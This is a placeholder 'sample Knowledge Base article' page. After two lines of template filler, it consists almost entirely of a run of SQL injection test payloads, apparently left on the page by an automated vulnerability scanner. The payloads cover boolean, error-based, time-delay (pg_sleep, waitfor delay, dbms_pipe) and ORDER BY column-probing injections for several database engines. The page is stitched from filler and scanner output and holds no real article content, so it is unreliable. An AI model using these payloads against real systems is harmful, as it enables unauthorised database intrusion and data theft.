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This is a sample Knowledge Base article, just to give you a clue what it looks like. Subtitle Here you can explain the knowledge base article in detail. If applicable, explain how the problem can be worked around....jgjp, 9887, jgjp).)'.(,("), jgjp'piceaj<'">hifmhz, jgjp') and 9799=3947 and ('jbkl'='jbkl, jgjp' and 5113=6472 and 'bxbv'='bxbv, jgjp) and 2355=2536 and (2033=2033, jgjp and 4619=3863, jgjp and 8594=8356-- znuj, (select (case when (4545=9950) then 'jgjp' else (select 9950 union select 5703) end)), jgjp') and extractvalue(5042,concat(0x5c,0x7178707871,(select (elt(5042=5042,1))),0x716a706271)) and ('rdla'='rdla, jgjp' and extractvalue(5042,concat(0x5c,0x7178707871,(select (elt(5042=5042,1))),0x716a706271)) and 'bskx'='bskx, jgjp) and extractvalue(5042,concat(0x5c,0x7178707871,(select (elt(5042=5042,1))),0x716a706271)) and (2930=2930, jgjp and extractvalue(5042,concat(0x5c,0x7178707871,(select (elt(5042=5042,1))),0x716a706271)), jgjp and extractvalue(5042,concat(0x5c,0x7178707871,(select (elt(5042=5042,1))),0x716a706271))-- ocgo, jgjp and 7708=cast((chr(113)||chr(120)||chr(112)||chr(120)||chr(113))||(select (case when (7708=7708) then 1 else 0 end))::text||(chr(113)||chr(106)||chr(112)||chr(98)||chr(113)) as numeric), jgjp and 7708=cast((chr(113)||chr(120)||chr(112)||chr(120)||chr(113))||(select (case when (7708=7708) then 1 else 0 end))::text||(chr(113)||chr(106)||chr(112)||chr(98)||chr(113)) as numeric)-- hggq, jgjp and 2693 in (select (char(113)+char(120)+char(112)+char(120)+char(113)+(select (case when (2693=2693) then char(49) else char(48) end))+char(113)+char(106)+char(112)+char(98)+char(113))), jgjp and 2693 in (select (char(113)+char(120)+char(112)+char(120)+char(113)+(select (case when (2693=2693) then char(49) else char(48) end))+char(113)+char(106)+char(112)+char(98)+char(113)))-- wjxc, jgjp');select pg_sleep(5)--, jgjp';select pg_sleep(5)--, jgjp);select pg_sleep(5)--, jgjp;select pg_sleep(5)--, jgjp');waitfor delay '0:0:5'--, jgjp';waitfor delay '0:0:5'--, jgjp);waitfor delay '0:0:5'--, jgjp;waitfor delay '0:0:5'--, jgjp');select dbms_pipe.receive_message(chr(75)||chr(101)||chr(103)||chr(68),5) from dual--, jgjp';select dbms_pipe.receive_message(chr(75)||chr(101)||chr(103)||chr(68),5) from dual--, jgjp);select dbms_pipe.receive_message(chr(75)||chr(101)||chr(103)||chr(68),5) from dual--, jgjp;select dbms_pipe.receive_message(chr(75)||chr(101)||chr(103)||chr(68),5) from dual--, jgjp') and (select 6427 from (select(sleep(5)))dczx) and ('hjaa'='hjaa, jgjp' and (select 6427 from (select(sleep(5)))dczx) and 'bxax'='bxax, jgjp) and (select 6427 from (select(sleep(5)))dczx) and (4250=4250, jgjp and (select 6427 from (select(sleep(5)))dczx), jgjp and (select 6427 from (select(sleep(5)))dczx)-- hpil, jgjp') and 7943=(select 7943 from pg_sleep(5)) and ('xozq'='xozq, jgjp' and 7943=(select 7943 from pg_sleep(5)) and 'ilge'='ilge, jgjp) and 7943=(select 7943 from pg_sleep(5)) and (2942=2942, jgjp and 7943=(select 7943 from pg_sleep(5)), jgjp and 7943=(select 7943 from pg_sleep(5))-- nikq, jgjp') waitfor delay '0:0:5' and ('oyba'='oyba, jgjp' waitfor delay '0:0:5' and 'ynqh'='ynqh, jgjp) waitfor delay '0:0:5' and (8780=8780, jgjp waitfor delay '0:0:5', jgjp waitfor delay '0:0:5'-- htsb, jgjp') and 6513=dbms_pipe.receive_message(chr(77)||chr(86)||chr(83)||chr(77),5) and ('styy'='styy, jgjp' and 6513=dbms_pipe.receive_message(chr(77)||chr(86)||chr(83)||chr(77),5) and 'pira'='pira, jgjp) and 6513=dbms_pipe.receive_message(chr(77)||chr(86)||chr(83)||chr(77),5) and (4651=4651, jgjp and 6513=dbms_pipe.receive_message(chr(77)||chr(86)||chr(83)||chr(77),5), jgjp and 6513=dbms_pipe.receive_message(chr(77)||chr(86)||chr(83)||chr(77),5)-- sgan, jgjp') order by 1-- zplq, jgjp') order by 2020-- isft, jgjp' order by 1-- fyab, jgjp' order by 7823-- ngyw, jgjp) order by 1-- lfgn, jgjp) order by 7203-- puip, jgjp order by 1-- akpg, jgjp order by 2756-- xptm, jgjp order by 1-- lixp, jgjp order by 4378-- hccw